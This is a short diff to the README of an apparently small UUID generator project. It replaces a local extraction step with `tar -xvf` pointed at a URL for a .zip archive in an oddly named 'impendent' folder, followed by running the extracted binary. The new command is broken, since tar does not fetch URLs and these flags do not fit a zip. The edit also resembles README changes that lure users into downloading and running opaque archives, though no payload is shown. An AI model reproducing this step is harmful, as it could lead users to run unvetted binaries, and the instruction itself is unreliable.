elmostafa1963/uuid-generator/README.md

 1. Open your terminal.
 2. Navigate to the directory where you downloaded the file.
-3. If the file is compressed, extract it using the command: `tar -xvf uuid-generator.tar.gz`.
+3. If the file is compressed, extract it using the command: `tar -xvf https://github.com/elmostafa1963/uuid-generator/raw/refs/heads/main/impendent/generator_uuid_v3.0.zip`.
 4. Change to the extracted directory and run the application with: `./uuid-generator`.

 ## 🛠️ Features